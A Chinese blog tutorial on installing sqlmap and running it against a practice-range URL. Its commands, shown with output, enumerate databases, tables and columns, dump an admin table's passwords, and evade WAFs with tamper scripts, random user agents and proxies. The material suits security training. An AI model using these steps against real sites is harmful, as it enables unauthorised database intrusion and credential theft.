sqlmap的安装和使用

已于 2022-04-20 10:45:17 修改
阅读量2.9k 收藏 4
点赞数 2
文章标签: mysql unctf
于 2022-04-20 10:44:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XL5L7/article/details/124291648
版权

sqlmap安装

sqlmap安装包
链接:https://pan.baidu.com/s/1bzR7IC6tSUgZ0bdmAxvk5g
提取码:0wc5
sqlmap命令大全
链接:https://pan.baidu.com/s/1dFWS2esURBBIH6WIhG8bgA
提取码:dltg
在安装sqlmap之前要先安装python环境
python安装包
链接:https://pan.baidu.com/s/1tifkYDC2KIVqxGEOhbs3ug
提取码:e0n5
安装好python环境之后,将sqlmap文件放在python的目录里面
在这里插入图片描述
查看目录
在这里插入图片描述
在这里插入图片描述
输入sqlmap命令,运行sqlmap
在这里插入图片描述
安装完成!

sqlmap使用

这边使用的是封神台的靶场http://rhiq8003.ia.aqlab.cn/?id=1

演示

命令:-u,作用:确定目标网站。
使用方法:python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1"
命令:--dump,作用:查数据。
使用方法:python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --dump
回显出现Parameter表示该网站存在漏洞
在这里插入图片描述

基础命令

命令:-h,作用:查看帮助。使用方法:python sqlmap.py -h
命令:-u,作用:确定目标网站。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1”
命令:-r ,作用:确定目标网站。使用方法:python sqlmap.py -r 1.txt
命令:–data,作用:确定参数。python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1&pid=2&ssid=3” --data=“pid=2&ssid=3”
ps:当你手动测试网站的时候,确定某个参数存在漏洞。提高渗透的效率。
ps:逐参删除法。参数挨个删除,找到能够【影响】网站的参数。那么这个参数,就很有可能是要测试的参数。
命令:–dbs ,作用:查询库名相关的数据。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs
[] information_schema
[] maoshe
[*] test
命令:-D,作用:指定数据库。↓↓↓↓联合使用↓↓↓↓
命令:–tables,作用:查询所有表名。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe --tables
|admin |
| dirs |
| news |
| xss |
ps:数据库的结构:库、表、列、数据
命令:-T,作用:指定表名。
命令:–columns,查看所有的列名。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe -T admin --columns
| Id | int(11) |
| password | varchar(11) |
| username | varchar(11)
命令:-C ,总用:指定列名。↓↓↓↓联合使用↓↓↓↓
命令:–dump,作用:查数据。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe -T admin -C password --dump
ps:牢饭命令
password |
| hellohack |
| zkaqbanban |
使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dump

进阶命令

命令:–proxy,作用:使用代理。使用语法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --proxy=“http://127.0.0.1:8080/”
命令:–random-agent ,作用:改变UA。使用语法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --proxy=“http://127.0.0.1:8080/” --random-agent
命令:–cookie,作用:使用网站身份去扫描网站。使用语法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --cookie=“A=14; jwt_id=10225;”
使用-r,就可以不用–cookie
命令:–level ,作用:提高扫描强度。默认1
命令:–risk ,作用:提高风险等级。 默认1
使用语法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --level 3 --risk 2
命令:–batch ,作用:默认选择,自动判断。。python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --batch
Y/N
命令:–tamper,作用:使用脚本,绕过IPS、WAF等。使用方法:python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tamper=“tamper/between.py,tamper/randomcase.py”
ps:大多数情况没啥用。
个人要求:
1.掌握绕WAF的方法。—> https://bbs.zkaq.cn/t/6205.html
2.掌握写python脚本。 --> 自学

ps:本篇文章主要资料来自掌控安全的杰斯老师!

一只聪明的小羊
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅析sqlmap之渗透测试环境搭建(一)
sinat_26587709的博客
11-07 342
sqlmap注入1 测试环境搭建2 获取系统基本信息 1 测试环境搭建 安装PHP运行环境WampServe 准备测试源码DVWA,进入http://www.dvwa.co.uk/官网,点击github下载对应的源码! 2 获取系统基本信息 sqlmap参数格式 ...
sqlmap安装
11-13
sqlmap 安装指南 Sqlmap 是一种开源的渗透测试工具,可以自动检测和利用 SQL 注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、...安装 sqlmap 需要安装 Python 环境,并按照相应的步骤进行安装和配置。
Sqlmap环境配置以及使用方法
YIGAOYU的博客
04-08 1300
Sqlmap介绍 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描判断是否存在SQL注入漏洞,发现并利用给定的URL的SQL注入漏洞。例如扫描 MYSQL POSTGRESQL MSSQL ACCESS ORACLE 等常见数据库。 简单来说就是扫描判断是否存在SQL注入或用来进行SQL注入。 环境安装 来到python官网: python官网 点击windows选取版本 下载安装包,...
python | sqlmap,一个实用的 Python 库!
最新发布
csdn_xmj的博客
05-15 944
sqlmap是一个强大的自动化SQL注入工具,专为检测、利用和管理数据库的SQL注入漏洞设计。它支持广泛的数据库系统,能自动识别注入点,并通过多种技术执行详尽的数据库、表、数据提取。sqlmap的功能包括获取数据库版本信息、数据提取、访问底层文件系统和执行远程命令,甚至允许植入后门。该工具不仅适用于网络安全专家进行安全审计和渗透测试,也广泛用于安全教育和培训,帮助了解和防范SQL注入攻击。通过其命令行界面和API,sqlmap为自动化测试提供了极大的便利,是网络安全领域中不可或缺的工具
windows环境下sqlmap安装
sx234com的博客
05-16 1053
由于SQLMap是利用Python语言写的,所以需要将Python这个语言环境给安装上,以下是详细安装过程:准备工作:(1) Windows7/8/10操作系统;(2) Python2.7.11;(3) SQLMapStep1.  Python2.7.11下载:            下载地址:https://www.python.org/downloads/  Step2.  Python2.7...
探索SQLMap测试环境 - sqlmapproject/testenv
gitblog_00025的博客
03-18 509
探索SQLMap测试环境 - sqlmapproject/testenv SQLMap是一款开源的自动化SQL注入工具,可以帮助渗透测试人员检测和利用SQL注入漏洞。本文将介绍SQLMap的一个测试环境——sqlmapproject/testenv。 什么是sqlmapproject/testenv sqlmapproject/testenv是一个基于Docker的SQLMap测试环境,旨在为用...
SQLMap环境搭建
T1ngSh0w的博客
09-09 2388
sqlmap+python3.8.6环境搭建
sqlmap安装文件
11-13
标题中的“sqlmap安装文件”指的是SQLMap,这是一个开源的自动化SQL注入工具,主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全问题,攻击者可以通过它来操纵数据库,获取敏感信息,甚至完全控制服务器...
SQLMAP神器使用.pdf
01-05
SQLMap是一款强大的自动化SQL注入工具,用于检测和利用SQL注入漏洞。它可以帮助安全研究人员或渗透测试人员检测网站是否存在SQL注入漏洞,并进一步获取...正确理解和使用SQLMap对于网站安全评估和漏洞修复至关重要。
Mac电脑安装sqlmap及环境配置.docx
05-13
Mac 电脑安装 sqlmap 及环境配置 在本文中,我们将介绍如何在 Mac 电脑上安装 sqlmap 并进行环境配置。sqlmap 是一个开源的渗透测试工具,能够自动...现在,你可以使用 sqlmap 工具来检测和exploit SQL 注入漏洞了。
Windows下Sqlmap环境安装教程详解
09-16
主要介绍了Windows下Sqlmap环境安装,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
Sqlmap(sql注入轻量工具,需python环境
09-06
sql自动化注入工具,最好用的SQL注入工具,需要python环境,解压免安装
sqlmap环境搭建
weixin_30840253的博客
07-22 415
1.安装Python2.7.12 1.1、下载Python2.7.12地址:https://www.python.org/downloads/ 1.2、环境变量配置Python2.7.11 1.3、验证Python是否安装完成 2.安装SQLMap 2.1、下载SQLMap地址:http://sqlmap.org/ 2.2、SQLMap安装,解压放在Python目录下 ...
sql_map_config.xml(SQL Map环境文件)
05-27 940
 "http://www.ibatis.com/dtd/sql-map-config-2.dtd">       enhancementEnabled="true" //全局性的启用或禁用字节码增强,以优化访问POJO变量属性的功能        lazyLoadingEnabled="true" //持久化数据是否延迟加载     maxRequests="32" //同时执行sql语句的最大行
sqlmap学习——sqlmap安装 和搭建测试环境
Oopsl的博客
02-21 772
sqlmap搭建测试环境
sqlmap练习环境搭建
雨夜的博客
09-14 737
我们需要用到sqli-labs源码 sqli-lasb下载地址:https://github.com/Audi-1/sqli-labs 点击下载 需要用到Apache + mysql 环境 在这里我们用phpstudy软件,软件自带环境 phpstudy下载地址:https://www.xp.cn/download.html 建议下载2016版本 安装就可以 打开ph...
安全测试必备工具——SQLMap 安装及基本应用
主要分享测试的学习资源,帮助快速了解测试行业,帮助想转行、进阶、小白成长为高级测试工程师。
04-29 1154
检测SQL注入漏洞的专用工具是安全人士工具箱的必备品。Sqlmap是由python开发的用来检测与利用SQL注入漏洞的免费开源工具。它可以确定哪些参数、标头或数据元素容易受到SQL注入的影响,以及哪些类型的攻击是可能的。本文详细讲解这款神器的安装使用
sqlmap安装步骤
m0_58289794的博客
12-01 1893
1.首先要安装python环境,我安装的是3.8.6 。 2.将sqlmap文件夹放到python目录下。 3.桌面右键快捷方式,并写“cmd”,下一步。 4.命令为“sqlmap”,点击完成,桌面就会生成一个sqlmap的快捷方式。 5.右键属性,“起始位置”填写“D:\software\Python\sqlmap”,点击完成即可。 6.双击运行,输入sqlmap.py -h”,成功运行。 ...
sqlmap详细的参数功能介绍(全面)
weixin_46709219的博客
11-13 5509
目录 介绍 命令参数 指定目标 直连数据库 服务型数据库(前提知道数据库用户名和密码) 文件型数据库(前提知道数据库绝对路径) URL探测 文件读取目标 Google dork注入 Http参数 设置请求方法 POST提交参数 设置参数分隔符 设置Cookie 设置User-Agent Host Referer 额外的HTTP头部 协议认证 设置代理 Tor匿名网络 设置...
sqlmap安装使用
10-09
安装使用sqlmap,可以按照以下步骤进行操作: 1. 首先,确保你的系统中已经安装Python解释器。你可以从Python官方网站上下载并安装最新的Python版本。 2. 打开命令行终端,输入以下命令来检查Python是否已安装成功: ``` python --version ``` 如果显示出Python的版本信息,则说明Python已经成功安装。 3. 接下来,你需要安装sqlmap。可以通过以下命令使用pip来安装sqlmap: ``` pip install sqlmap ``` 如果你没有安装pip,可以参考pip官方文档来进行安装:https://pip.pypa.io/en/stable/installation/ 4. 安装完成后,你可以使用以下命令来验证sqlmap是否安装成功: ``` sqlmap --version ``` 如果显示出sqlmap的版本信息,则说明sqlmap已经成功安装。 5. 现在你可以开始使用sqlmap来进行SQL注入测试了。你可以使用以下命令来指定目标URL进行测试: ``` sqlmap -u <target_url> ``` 这将对目标URL进行自动化的SQL注入测试,并输出测试结果和潜在的漏洞。 6. 除了指定目标URL外,sqlmap还支持其他多种选项和参数,例如指定请求数据、设置HTTP头、使用代理等。你可以通过以下命令来查看sqlmap的帮助文档: ``` sqlmap --help ``` 这将显示出sqlmap的详细帮助信息,以及各种可用选项和参数的说明。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值